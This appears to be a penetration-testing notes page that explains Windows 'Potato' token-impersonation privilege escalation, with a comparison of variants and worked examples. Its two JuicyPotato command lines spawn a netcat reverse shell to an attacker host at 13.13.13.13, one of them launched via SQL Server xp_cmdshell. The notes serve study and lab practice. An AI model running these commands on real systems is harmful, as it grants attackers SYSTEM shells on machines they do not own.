DiscordHackTheBoxTryHackMeGitHub

Potatoes

About

Potato-styled attacks is Windows privilege escalation techniques that exploit token impersonation, NTLM relay, and COM/DCOM misconfigurations to gain SYSTEM privileges from a lower-privileged service account. These attacks target specific privileges assigned to service accounts, such as:

  • SeImpersonatePrivilege – Allows impersonation of another user's token.

  • SeAssignPrimaryTokenPrivilege – Allows assignment of a token to a process.

Common Principles:

  1. Privilege Escalation via Token Impersonation

    • They exploit SeImpersonatePrivilege to impersonate a SYSTEM token.

    • Some variants also abuse SeAssignPrimaryTokenPrivilege to assign SYSTEM tokens to processes.

  2. Exploitation of Windows Authentication or COM Services

    • Older Potatoes (Rotten, Juicy): Use DCOM activation to trigger SYSTEM-level COM objects.

    • Newer Potatoes (Sweet, Bad, Rogue, Print): Leverage NTLM authentication relay and RPC abuse to request privileged tokens.

  3. No Exploits Needed – Just Misuse of Windows Features

    • These attacks work without exploiting a software vulnerability—they abuse legitimate Windows functionalities like COM objects, NTLM relay, and DCOM interfaces.

Comparison of Major Potato Attacks

Exploit

Method Used

Target Privileges

Works on Modern Windows?

Rotten Potato

NTLM Relay (Fake RPC server)

SeImpersonatePrivilege

❌ (Patched)

Juicy Potato

COM Object Spoofing (CLSID)

SeImpersonatePrivilege

❌ (Patched, requires CLSID)

Sweet Potato

NTLM Relay via DCOM Task Scheduler

SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege

✅ (Works on modern Windows)

Rogue Potato

RPC/DCOM NTLM Capture

SeImpersonatePrivilege

✅ (Bypasses Juicy Potato patch)

PrintSpoofer

Named Pipe + Print Spooler Trick

SeImpersonatePrivilege

✅ (Works on modern Windows)

Juicy Potato

In Windows, every process has a token containing account information, which can be exploited if the SeImpersonatePrivilege privilege is available. This privilege, often found in service accounts, allows a process to impersonate another, enabling privilege escalation from Administrator to SYSTEM.

Legitimate programs use this for tasks like calling WinLogon to obtain a SYSTEM token. Attackers exploit this via Potato-style attacks tricking a SYSTEM process into connecting to a malicious one, allowing token theft.

This privilege is common in web shells, Jenkins RCE, and MSSQL command execution. If found, it often provides an easy path to SYSTEM access. Always check for it after gaining code execution.

Example

SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 13.13.13.13 1337 -e cmd.exe" -t *

  1. Execute Juicy Potato via xp_cmdshell

  • xp_cmdshell allows OS command execution in SQL Server.

  • If enabled, it can run Juicy Potato under the SQL Server service account.

  • The service account often has SeImpersonatePrivilege, which is required for Juicy Potato.

  1. Abuse Token Impersonation

  • Juicy Potato listens on port 53375 for a COM request (-l 53375).

  • It spawns cmd.exe (-p c:\windows\system32\cmd.exe) and executes a reverse shell with nc.exe.

  • The attack succeeds if the SQL Server service can impersonate SYSTEM.

  1. Reverse Shell Execution via Netcat

  • cmd.exe runs with SYSTEM privileges and executes:

    c:\tools\nc.exe 13.13.13.13 1337 -e cmd.exe

  • This connects back to 13.13.13.13:1337 (attacker host), giving an attacker SYSTEM shell access.

Example 2

I used this example for one task in Academy, used it from command injection powershell reverse shell

.\JuicyPotato.exe -l 53375 -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}" -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe -e cmd.exe 13.13.13.13 9999" -t *
PreviousPrivilege AbuseNextSeDebugPrivilege

Last updated